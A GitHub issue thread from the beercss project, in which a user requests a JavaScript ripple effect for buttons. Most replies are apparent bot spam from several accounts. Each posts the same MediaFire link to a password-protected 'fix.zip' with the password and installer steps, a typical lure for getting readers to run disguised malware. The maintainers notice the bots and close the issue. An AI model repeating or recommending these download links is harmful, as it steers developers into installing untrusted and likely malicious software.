### ISSUE TITLE
Mismatched ripple effect

### ISSUE THREAD

**Issue by LIGMATV** [beercss/beercss#363]
Reopen #190 issue & [F20](https://github.com/beercss/beercss/issues/65#issuecomment-2211552066) Feature Request. Also related with #189, #206, #315, #346.

The ripple that used in Beer.css was an pure CSS hack, which look less professional. The other Material framework always using an traditional ripple ([Materialize](https://materializecss.com/buttons.html), [Material Angular](https://material.angular.io/components/button/overview).) And both was using an seperated element to ripple in button. (Like `waves-ripple` in Materialize and `mat-ripple` in Angular. We can do the same thing with pure Javascript.

Here's an good point for using an traditional ripple :

- **Good code** - The ripple that still used in Beer.css using `:after` selector, which if we want insert content in after button directly using CSS, the ripple will get override. (I know we can add `<span>` in button, but still dirty)
- **Easy customization** - The ripple that i made was customizable like change the duration & color.
- **Fancy experience** -  The ripple effect when we click it was fancy and addictive, also make it more real and native.

![Screenshot Capture - 2024-07-06 - 07-40-05](https://github.com/beercss/beercss/assets/143163098/c3442653-0854-435b-8af6-8068df15370b)
[Check here.](https://codepen.io/LIGMATV/pen/jOjNxYy)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LIGMATV** [comment]
How these bots working on GitHub?!

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LIGMATV** [comment]
...

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by leonardorafael** [comment]
I will delete this issue, there are a lot of bots here 😕

**Comment by leonardorafael** [comment]
I will close this issue. It was infested by bots, just transferring to https://github.com/beercss/beercss/issues/368
